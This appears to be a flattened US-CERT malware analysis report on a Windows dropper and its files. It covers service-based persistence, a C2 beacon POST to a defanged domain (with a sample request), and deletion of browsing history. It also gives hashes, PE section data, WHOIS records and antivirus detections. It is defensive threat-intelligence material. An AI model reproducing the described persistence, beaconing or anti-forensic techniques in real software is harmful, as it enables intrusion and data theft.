MAR-10303705.r1.v1
Malware Characterization
//node() | //@*
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
US-CERT
2020-09-29T09:39:59-04:00
BMachine
38
7.1.0
\AppData\Roaming\Media\mediaplayer.exe
HKLM\System\CurrentControlSet\Services\TaskFrame DisplayName: TaskFrame
HKLM\System\CurrentControlSet\Services\TaskFrame ObjectName: LocalSystem
--- End Service Parameters ---
This service is used to create persistence on the system and is designed to start the 'mediaplayer.exe' (927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) program each time the system is started.
Next, the program will collect system information to send to the command and control (C2). A unique identifier is created and sent in a POST request along with a Unix timestamp of the time of infection to the domain www[.]sdvro.net. Connection attempts are made via both HTTP and HTTPS. The following is a sample of the POST request:
--- Begin POST Request ---
POST /v?m=u2fssrqh8cl0&i=1598908417 HTTP/1.1
Accept: application/octet-stream,application/xhtml
Content-Length: 436
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75
Host: www[.]sdvro.net
Connection: Keep-Alive
Cache-Control: no-cache
..D......!F.1y^.4.&....{ ..f]..Fz...;..H.\L`p..$.H..0A.A(An_8...;..$yH.t..4H...3..K.QvRkX.c..|r r=..V.F.....Hc.H......H.<..tfH....@..uU.@.....uL..D.=o..l!'..D$hH.&.H.f..H.f(..F..n.H..H.\$`H.l$pH..0A_A]A\_^...H.\$.H.t..gH...3..f..K..-.
..|
=../.:.....Hc.H......H.<..tfH....@..uU.r.0.0.[L..t.
o..2!v..D
hy...p.f..H.f(..F..n.H..H.\$`H.l$pH..0A_A]A\_^...H.\$.H.t$.WH..03..K..K(...3..|$ ;=..........Hc.H......H.:..tWH....@..uU.@.....uL..D.
--- End POST Request ---
The domain did not resolve to an IP address at the time of analysis. Note: The malware uses the fixed User-Agent string, "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" in its communication.
The following notable strings were found in unreferenced data within the file. The purpose of the strings could not be determined. The strings are not used by the code.
--- Begin Notable Strings ---
C:\Users\david\AppData\Roaming\Media\mediaplayer.exe
david-pc
--- End Notable Strings ---]]>
448838B2A60484EE78C2198F2C0C9C85
117760
PE32 executable (GUI) Intel 80386, for MS Windows
MD5
448838b2a60484ee78c2198f2c0c9c85
SHA1
f2c43a01cabaa694228f5354ea8c6bcf3b7a49b3
SHA256
64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
SHA512
9e532af06e5f4764529211e8c5c749baa7b01c72f11b603218c3c08d70cf1e732f8d9d81ec257ca247aaa96d1502150a2f402b1b3914780b6344222b007dd53f
SSDEEP
3072:PGA5q4Xmco7ciR7BiU+q+TESaiQ4RHpxJdW:O0qtUYBiU+qRiQy
Microsoft Visual C++ ?.?
6.156007
6
2019-04-29 10:19:52-04:00
1024
MD5
502dceaf120f990b5118230438102568
2.390635
.text
39424
6.506891
MD5
1ec70611505f1cebfc859820b45b6cc3
.rdata
12288
4.988754
MD5
dfebe81d71d56100ac07b85046f07b77
.data
59392
6.004077
MD5
06f5259aac1a4462eaf12334dc0e8daf
.rsrc
512
5.105006
MD5
c2d6c399730fd89b16d2b6d6cec5e393
.reloc
5120
3.993742
MD5
1587227ab56ecfb9c5b85aaf24d98454
Dropped
Connected_To
Dropped
sdvro.net
Related_To
Related_To
Related_To
Connected_From
Related_To
80
TCP
443
TCP
Domain Name: SDVRO.NET
Registry Domain ID: 2371496862_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.west263.com
Registrar URL: http://www.west.cn/
Updated Date: 2020-03-31T08:26:43Z
Creation Date: 2019-03-21T07:42:43Z
Registry Expiry Date: 2021-03-21T07:42:43Z
Registrar: Chengdu West Dimension Digital Technology Co., Ltd.
Registrar IANA ID: 1556
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: ok https://icann.org/epp#ok
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
DNSSEC: unsigned
Domain Name: sdvro.net
Registry Domain ID: whois protect
Registrar WHOIS Server: whois.west.cn
Registrar URL: www.west.cn
Updated Date: 2019-03-21T07:42:42.0Z
Creation Date: 2019-03-21T07:42:42.0Z
Registrar Registration Expiration Date: 2021-03-21T07:42:42.0Z
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Reseller:
Domain Status: ok http://www.icann.org/epp#ok
Registry Registrant ID: Not Available From Registry
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: Chengdu
Registrant State/Province: Sichuan
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Registry Admin ID: Not Available From Registry
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: Chengdu
Admin State/Province: Sichuan
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: CN
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Registry Tech ID: Not Available From Registry
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: Chengdu
Tech State/Province: Sichuan
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: CN
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Name Server: ns3.myhostadmin.net
Name Server: ns4.myhostadmin.net
DNSSEC: signedDelegation
mediaplayer.exe
46080
PE32 executable (GUI) Intel 80386, for MS Windows
MD5
9f23bd89694b66d8a67bb18434da4ee8
SHA1
db8c6ea90b1be5aa560bfbe5a34577eb284243af
SHA256
927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
SHA512
72e95a90dc8ee2fd69b26665e88d19b1d36527fe8bbc03e252d4be925cf4acae20a3155dcd7caa50daf6e16d201a16822d77356c91654a6e4a05981425574c5b
SSDEEP
768:NRw4PZcMc8ie9+dZL6DSKdzxSGyCevVcxjw3e3PxKfRXAxo3vhxfFORpa9sxw:NRwaBiU+dZODSKeGHSaxjw3QUfRH/hx7
Microsoft Visual C++ ?.?
6.320571
6
2019-04-29 10:18:34-04:00
1024
MD5
faf4cd402ffdb84551c382ea45f2f893
2.514929
Tdl Corporation
Local Security Process
1.0.0.1
None
Copyright (C) 2018
None
Tdl Corporation
1.0.0.1
.text
31232
6.493665
MD5
7e3095c827af75a349f3c206925932cd
.rdata
8192
5.232371
MD5
614ccbacb5de6dae94b6af93aa5a83fc
.data
1536
4.679413
MD5
543ffbd535401feb9f37c585d9f161f3
.rsrc
1024
2.333786
MD5
7c1584feb039309d7a4307c39adaa54f
.reloc
3072
4.519356
MD5
79345fb74e56359cd6eb957ceb52e0ab
Created
Created
Dropped_By
Global\mukimukix0
RasPbFile
\AppData\Local\Temp\wHPEO.exe
--- End Registry Modification ---
This modification insures that the file is deleted with the next system restart. The program will also delete the user's 'index.dat' file thus removing the user’s recent Internet history from the system.]]>
wHPEO.exe
7168
PE32 executable (GUI) Intel 80386, for MS Windows
MD5
92a40c64cea4a87de1c24437612f2e0f
SHA1
f52f0685a72d6a8f3e119ce92b7cf1c2c6a83bb9
SHA256
4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
SHA512
d0714d09dcac070eb8d0971e953ce0c0382658d5682982a8045dcf29da9a729be57dc7d60c4e18f1833966f6c6584e9a883871eef8d1c9f9d3b5dd100c69b9a4
SSDEEP
192:DcTrBTVdZzgW+mpWpc9aThFJJRmqSA9iu:c7EmpWpc9aThFVviu
Microsoft Visual C++ ?.?
5.395407
6
2017-12-04 08:14:24-05:00
1024
MD5
d6cd352d657372b25707fed98bc3bd0b
2.379332
.text
2560
5.788179
MD5
c036d2e814490871e54dd84e8117e044
.rdata
1536
4.849405
MD5
2f2819452977bcfd6dcac4389a2cd193
.data
512
1.342806
MD5
afadce14c7f045a0390158515331a054
.rsrc
1024
5.19446
MD5
554d0cedd69e96ee00c8324ce4da604c
.reloc
512
4.74113
MD5
ed7fec6ad28b233df4676dad7f306c3c
Dropped_By
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
448838b2a60484ee78c2198f2c0c9c85
SHA1
f2c43a01cabaa694228f5354ea8c6bcf3b7a49b3
SHA256
64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
NCCIC
2020-09-30T19:15:35+00:00
Malicious Domain
Domain Watchlist
sdvro.net
NCCIC
2020-09-30T19:15:35+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
9f23bd89694b66d8a67bb18434da4ee8
SHA1
db8c6ea90b1be5aa560bfbe5a34577eb284243af
SHA256
927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
NCCIC
2020-09-30T19:15:35+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
92a40c64cea4a87de1c24437612f2e0f
SHA1
f52f0685a72d6a8f3e119ce92b7cf1c2c6a83bb9
SHA256
4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
NCCIC
2020-09-30T19:15:35+00:00
MAEC Characterization of 448838b2a60484ee78c2198f2c0c9c85
BitDefender
Dropped:Generic.Malware.Fdldg.B04B59A4
Comodo
TrojWare.Win32.ButeRat.PP
Emsisoft
Dropped:Generic.Malware.Fdldg.B04B59A4 (B)
Lavasoft
Dropped:Generic.Malware.Fdldg.B04B59A4
Ikarus
Trojan-PWS.Win32.Zbot
bot
dropper
information-stealer
keylogger
remote-access-trojan
trojan
command-and-control
MAEC Characterization of 9f23bd89694b66d8a67bb18434da4ee8
Symantec
Heur.AdvML.B
BitDefender
Gen:Variant.Fugrafa.6689
Emsisoft
Gen:Variant.Fugrafa.6689 (B)
Lavasoft
Gen:Variant.Fugrafa.6689
10303705.r1.v1
Malicious Code
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected